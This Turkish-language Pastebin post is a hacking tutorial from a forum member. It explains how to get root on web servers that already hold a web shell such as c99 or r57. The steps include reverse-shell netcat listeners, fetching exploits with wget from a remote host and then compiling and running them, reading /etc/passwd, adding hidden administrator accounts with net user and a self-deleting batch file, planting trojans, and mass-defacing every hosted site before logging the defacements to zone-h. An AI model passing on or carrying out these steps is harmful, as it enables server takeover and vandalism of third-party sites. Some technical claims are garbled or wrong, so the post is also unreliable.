Advertisement
KingSkrupellos

Win Linux OS Sunucuda Sh3LL ile Rooting Olma Detaylı Anlatım

Dec 4th, 2017
136
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.78 KB | None | 0 0
  1. Selamün Aleyküm Cyberizmciler ben KingSkrupellos Cyberizm.Org. Bugün size server rootlamaya elimden geldiğince anlatmaya çalıştım. Konuya uygun videolarda buldum. Bu konuyu forumda
  2.  
  3. https://www.cyberizm.org/cyberizm-win-linux-os-sunucuda-sh3ll-ile-rooting-olma-detayli-anlatim.html
  4.  
  5. sevdiğim bir kardeşimin hatırına yaptım. Sizlerde faydalanın istedim.
  6. (Administrar/root) en servidores Windows (C99 Shell)
  7. [video=youtube]http://www.youtube.com/watch?v=LfX5n0a0RIk[/video]
  8. Windows Back Connect
  9. [video=youtube]http://www.youtube.com/watch?v=7gQ6cyqT_1k[/video]
  10. Linux Server Root
  11. [video=youtube]http://www.youtube.com/watch?v=aN6PklINTTU[/video]
  12. SQL injection+SHELL upload+Rooting a server
  13. [video=youtube]http://www.youtube.com/watch?v=dOpPbpUeeAo[/video]
  14. Serverda Shell ile root olmak için size lazım olan hack yemek malzemeleri => netcat programı, c99 veya r57 shell, zone-h sitesi mass deface kaydı perl, mass.pl, ve bir tanede index
  15. 1. YÖNTEM => Binshell ile açık bir porta bağlan. ondan sonra /tmp dizini her zaman permissonu 777 olan alandır, hostun üst dizinlerini görüntüleye biliyorsan /tmp dizinine girerek bindshelli buraya upload et.Eğer /tmp dizinini görme yetkin yoksa bindshelli ayrı bir servera atarız wget komutuyla shell bulunan serverın dizinine çek. /tmp te bindshellin duruyor ise (server türüne göre bindshellimiz) şimdi yapacağın iş c99 shell için tools bölümüne gelip bindshell yazan yerde bindshellimizin kullanıcı adı şifre ve portunu yazarak bağlanmaktır.Daha sonra tablodan halletcin işi.
  16. 2. YÖNTEM => NetCat programı ile ( hem sende kurulu hem karşı pc'de yada serverda kurulu olması gerekiyor - yada bir başka deyişle yüklenmesi gerekiyor )Daha sonra bir tablo çıkacak ondan sonrasını yine basitleşiyor.Bir diğer husus ise şöyle anlatıyım => Başlayalım başlat çalıştıra cmd yazıp tamam diyoruz. karşımıza siyah ms-dos ekranı gelecek bu ekrana nc -v -l -p 443 yazalım (ben 443 dedim sizde hangi port açıksa artık) enterlıyalım Ufak bi not: (bazen sizin portunuz açık olabilir ama serverin o portu açık olmayabilir açık server portunu Nmap - Zenmap GUI programı bize soyluyor. bununla tarayabilirniz)shellimizde de bu yazı çıktıktan sonra dos ekranına donelim baglandıkmı bakalım.Servera bağladıysanız hangi yıl olduğu ve sürümü çıkacaktır.Mesela bu yıl 2014 sürümü 2.7 olsun mesela. C+ exploitlerin dilidir.wget komutuyla exploiti server upload edelim ornek olarakwget http://xxx.com/2.7.c Bazen ise shelli manuel upload etmek zorunda kalabilirsiniz.attıgımız exploiti derleyecegiz şimdi ( derleme işleminde yeni isim verecegiz)gcc -o root 2.6.22.c (root yazdımız yere istediginizi yazabilirsiniz)chmod ayarı yapacagızchmod 777 root dedikten sonra explotimizi çağırmaya geldi sıra./root diyerek exploitimizi çağırıyoruz ID komutuyla kontrol edin.Evet serverımız rootlandı ise bu aşamadan sonra WhoAmI komutuyla görebiliriz.şimdi musait bi yere indeximizi ve mass.pl yi atalım.serverdakileri siteleri gormek içinse çok çeşitli yollarımız mevcuttur
  17. bu komutlar :
  18. [code]/etc/vdomainaliases/
  19. /etc/vfilters/
  20. /var/www/vhosts/
  21. /var/named/
  22. /etc/passwd/
  23. /etc/hosts/
  24. /etc/apache/
  25. /etc/apache2/
  26. /etc/named.conf/
  27. Mesela benimki böyle oldu => /var/www/vhosts/ cd /var/www/hosts/ [/code]
  28. komutunu verdikten sonra
  29. ls (LS yani) komutuyla sıralayıp gorebiliriz yada izinler açıksa shellden o dizine gecebiliriz
  30. siteleri bulup bilgisayarımızda C:/Perl/bin/ klasorunun içine hack.txt diyer kayıt edin.(bilgilsayarınızda perl Programı yuklu olmalıdır)
  31. kayıt ettikten sonra dos ekranında mass deface işlemine gecelim
  32. önce ekrana perl mas.pl yazıp nasıl çalıştıgınız kontrol ediyoruz daha sonra uygulamaya geciyoruz (orda example ı veriyor)
  33. mass deface biraz zaman alabilir sabırlı olmak gerek
  34. işlem bitince all homepages defaced diye bi yazı gelecek bu yazıdan sonra yine başlat çalıştır cmd ye geliyoruz
  35. [code]cd..
  36. cd..
  37. cd perl
  38. cd bin[/code]
  39. perl zoneh.pl hack.txt KingSkrupellos Cyberizm.Org diye (nickimi yazdım) yazıp enter diyoruz. Siz kendinize göre yapın işte.
  40. 3. YÖNTEM => Dosya upload yapmanı engelleyen temp dizinindeki bir dosyayı etkisiz hale getirmen gerekiyor.c99 shell proc. buluo birçok dosyayı silmemiz gerekiyor ki
  41. işimiz kolaylaşsın ve sistem çöksün herkese root yetkisi versin.
  42. 4. YÖNTEM => Server security information:
  43. Open base dir: /home/siteismi/:/usr/lib/php:/usr/local/lib/php:/tm
  44. gibi bir yazı bulman gerekiyor. Burada sadece sana lazım olan etc/passwd'ler bunlar ya bas, eğer basamassan webroot shell yükle onunla çek etc/passwd'leri.
  45. şöyle yazılar çıkacak mesela
  46. [code]root:x:0:0:root:/root:/bin/bash
  47. bin:x:1:1:bin:/bin:/sbin/nologin
  48. Gibi bilgiler verecek şimdi root dizini şu şekil
  49. root:x:0:0:root:/root:/bin/bash olduğu için yukarıya from:0 to: 0
  50. yazarak giriş yapıcaz gerisi sizin işinize kalıyor ..
  51. 5. YÖNTEM => Ayrıyetten birde ftp rootlama yöntemi var. Pro ftp kulanan bir hosting ise bu yolları görüntüleyerek (dikat ediniz conf ) şifreleri değiştirip root olabilirsiniz elde edeceğiniz ana< ftp sizi root yapar hosting içerisinde /home klasörü bütün sitelerin olduğu dizindir
  52. [code]proftpd.conf - /etc/proftpd.conf.tmpeditlib
  53. /etc/proftpd.conf.bytes
  54. /etc/proftpd.conf.rpmnew
  55. /etc/proftpd.conf.rpmsave
  56. /etc/proftpd.conf-
  57. /etc/proftpd.conf,v
  58. /etc/proftpd.conf
  59. /scripts/proftpd.conf.default.bsd
  60. /scripts/proftpd.conf.default[/code]
  61. 6. YÖNTEM => Diğer kısa bir anlatım - Linux server rootlamak için =>
  62. wget http://www.siteadi.com/exploits/exploitadi
  63. chmod 777 exploitadi
  64. ./exploitadi
  65. Şeklinde kullanıp serverı rootlayabilirsiniz.
  66. 7. YÖNTEM => bir win servera fso destekLi bir scriptLe girdigimiz zaman cmd iLe
  67. uzaktan komut iLe user ekleyip ;
  68. [code]net user pow3rz 123456 /add[/code]
  69. şekLinde sonra net user localgroup administrator pow3rz /add
  70. şekLinde admin yetkisi verip server ip aLıp uzak masaüstü iLe bağLanıp istedigimizi yaparız bu bir yöntem ;
  71. Eğer ki user ekeleyemezseniz
  72. [code]net user administrator /random[/code]
  73. komutuyla mevcut kullanicilarin şifrelerini öğrenebilirsiniz ;
  74. ama şöyLe düşüneLİm bir Nt servera girdik ve komut girme yetkimiz yok.
  75. neLer yapabiLiriz şimdi uzaktan komut verip user ekLeyemiyoruz ama komut çaLıştırabiLiyoruz.
  76. o zaman hemen size bir puf noktası veriyorum. yazdığımız bir kodu .bat formatına çevirip uzaktan user ekliyecez
  77. hemen başlıyalım bir txt açın ;
  78. içine
  79. [code]@echo
  80. net user cyberizm 123456 /add[/code]
  81. yazın ve cyberizm.bat die kayıt edin çaLıştırın ve denetim masasından kullanıcı hesapLarına baktığınız zaman
  82. cyberizm adında bir user oLuşturmuş olacak,
  83. şimdi hemen bir txt açıyoruz içine
  84. [code]@echo
  85. net user cyberizm 123456 /add
  86. del cyberizm.bat[/code]
  87. yazıyoruz ve cyberizm.bat die kaydediyoruz ve çalıştırıyoruz
  88. ve komuttan sonra cyberizm.bat siLinecegini göreceksiniz ve bu sayede fso içinde komut ekLetip
  89. useri kLetip aynı şekiLde administrator yetkisi vererek dosyaLarı siLdirip root düzeyine erişebiLİrsiniz.
  90. başka bir yöntem ; trojen iLe buda basit bir oLaydır arkadaşLar bir key buLnu kendi serverınızı oLuşturun.
  91. ve win servera upload edin :] serverda dosyayı çaLıştırın ve trojan buLuşacaktır. gidin proğramın cLientini
  92. açın ipden bağLanın ve client sayesinde proğram sayesinde pc ye bağLanın.
  93. 8. YÖNTEM => 2.6.30 dan 2.6.36-rc8 olan kernellerde
  94. backconnect çektikten sonra şu komutla
  95. [code]echo “alias net-pf-21 off” > /etc/modprobe.d/disable-rds[/code]
  96. yazdıktan sonra root olabilirsiniz.
  97. Not : Her server da çalışmaz.
  98. Not 2 => Yöntemler daha fazla geliştirelebilir. Beyninizi kullanın. Yöntemleri kendinize göre farklılaştırabilirsiniz.
  99. Anlatım bu kadar yeter. Umarım faydalı olmuştur.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement